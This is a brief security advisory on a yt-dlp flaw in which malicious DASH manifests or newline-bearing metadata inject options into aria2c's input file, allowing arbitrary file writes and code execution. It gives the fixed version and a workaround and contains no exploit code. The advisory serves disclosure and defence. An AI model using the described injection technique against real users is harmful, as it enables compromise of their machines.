yt-dlp arbitrary file write via aria2c in fragmented manifests

yt-dlp versions prior to 2026.06.09 allow arbitrary file write via aria2c when downloading fragmented manifests (HLS/DASH). Attackers can inject options into aria2c input file via malicious DASH manifests (using HTML newline escape) or via metadata fields with newlines (if --no-windows-filename is used). On Windows, this can lead to immediate arbitrary code execution; on all platforms, it can lead to code execution on next yt-dlp invocation by writing a malicious config file.

Users of yt-dlp who use aria2c as an external downloader for HLS/DASH streams.

Upgrade to yt-dlp version 2026.06.09 or later. If unable to upgrade, add '--downloader dash,m3u8:native' to your command.